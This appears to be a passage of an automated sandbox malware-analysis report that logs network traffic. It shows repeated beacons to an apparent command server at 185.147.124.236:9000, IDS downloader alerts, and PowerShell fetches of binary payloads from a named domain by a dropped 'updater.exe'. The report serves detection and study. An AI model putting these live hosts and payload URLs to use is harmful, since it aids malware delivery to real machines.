                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: E-STYLEISP-ASRU E-STYLEISP-ASRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49742 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49761 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49762 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49768 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49774 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49776 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49781 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49794 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49806 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49813 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49819 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49825 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49826 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49839 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49846 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49853 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49865 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49871 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49877 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49884 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49896 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49883 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49914 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49903 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49932 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49936 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49942 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49916 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49949 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49923 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49960 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49962 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49968 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49986 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50001 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50007 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50019 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50030 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50046 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50057 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50064 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50066 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50067 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50072 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50078 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50081 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50082 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50085 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50014 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50089 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50091 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50095 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50059 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50105 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50108 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50112 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50113 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50118 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50121 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50124 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50126 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50129 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50136 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 172.67.223.31:443
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.147.124.236
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_004D29BA
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/index.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pict.healthclinic-stylemaven.com
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
